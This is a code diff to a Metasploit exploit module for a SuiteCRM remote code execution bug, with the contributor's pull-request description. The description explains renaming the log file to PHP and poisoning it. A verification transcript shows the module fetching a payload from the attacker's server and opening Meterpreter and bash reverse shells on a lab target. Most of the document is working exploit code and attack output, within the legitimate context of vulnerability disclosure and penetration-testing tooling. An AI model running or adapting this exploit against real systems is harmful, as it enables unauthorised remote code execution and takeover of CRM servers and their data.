-      data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
-      data.add_part('Save', nil, nil, 'form-data; name="save"')
+    data = Rex::MIME::Message.new
+    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+    data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
+    data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
+    data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
+    data.add_part('Save', nil, nil, 'form-data; name="save"')
 
-      post_log_file(data)
-    end
+    post_log_file(data)
 
     data = Rex::MIME::Message.new
     data.add_part('Users', nil, nil, 'form-data; name="module"')
@@ -266,7 +279,26 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
     data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
 
-    post_log_file(data)
+    res = post_log_file(data)
+
+    print_error("Failed - #{action}") unless res && res.code == 301
+
+    print_good("Succeeded - #{action}")
+  end
+
+  def check_logfile_request(res, action)
+    fail_with(Failure::Unknown, "#{action} - no reply") unless res
+
+    unless res.code == 301
+      print_error("Failed - #{action}")
+      if datastore['RESTORECONF']
+        print_status('Attempting to restore configration')
+        restore_request = restore
+        print_error('Failed to restore confiugration') unless restore_request
+      end
+      fail_with(Failure::UnexpectedReply, 'Exiting')
+    end
+    print_good("Succeeded - #{action}")
   end
 
   def execute_php
@@ -308,6 +340,6 @@ class MetasploitModule < Msf::Exploit::Remote
     modify_system_settings_file
     poison_log_file
     execute_php
-    restore
+    restore if datastore['RESTORECONF']
   end
 end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -100,28 +100,21 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless version_check
-      vprint_error("#{peer} - Connection timed out")
-      Exploit::CheckCode::Unknown
-    end
+    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check
 
-    version = version_check.body[/Version 7.11.\d{1,2}/]
-    version_number = Integer(version.split('.').last)
+    fixed_version = Rex::Version.new('7.11.19')
+    version = version_check.body[/Version 7.11.\d{1,2}/].partition(' ').last
 
     if version.nil? || version.empty?
-      vprint_error('Could not determine version.')
       about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
-      print_status("Check #{about_url} to confirm version.")
-      Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
     end
+    
+    current_version = Rex::Version.new(version)
 
-    print_status("SuiteCRM Version #{version}")
+    return Exploit::CheckCode::Appears("SuiteCRM Version #{version}") if current_version < fixed_version
 
-    if version_number < 19
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
-    end
+    Exploit::CheckCode::Safe("SuiteCRM Version #{version}")
   end
 
   def authenticate


### PR DESCRIPTION
Hello, this is my first PR, so please go easy on me. 

I am submitting a module for an exploit I reported (two, technically) to SuiteCRM. The exploit allows for an administrator to modify system settings and control the name of the log file. The attacker can rename the log file to a PHP file and then poison the file with arbitrary PHP code. This code is sanitized to a degree, so the php code you can execute is limited, hence I only have two payloads added: `linux/x64/meterpreter_reverse_tcp` and `cmd/unix/bash_reverse_tcp`

This module will cover CVE-2020-28328 as well, however I am still waiting for the current CVE. This was patched in the latest release in April 2021. I requested the CVE ID from the vendor today, and they advised that they have not received it yet from Mitre.

A writeup can be found here:
https://theyhack.me/SuiteCRM-RCE-2/

And a previous writeup/exploit can be found here for the first issue:
https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/
https://www.exploit-db.com/exploits/49001

## Verification

List the steps needed to make sure this thing works.

This is a full run through with both modules.

```
msf6 > use exploit/linux/http/suitecrm_log_file_rce
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29
RHOSTS => 192.168.122.29
msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin
USER => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin
PASS => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125
SRVHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125
LHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > check

[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[+] SuiteCRM Version 7.11.18
[*] 192.168.122.29:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/NzzKmKY
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: fxg8pi1C.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target

meterpreter > getuid
Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.0.3 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i

Active sessions
===============

No active sessions.

msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1
target => 1
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/Kle8QoPV
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: 1cOyYGE3.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
exit
[*] 192.168.122.29 - Command shell session 2 closed.

```
I will be emailing a runthrough of each section as well to msfdev@metaspolit.com.
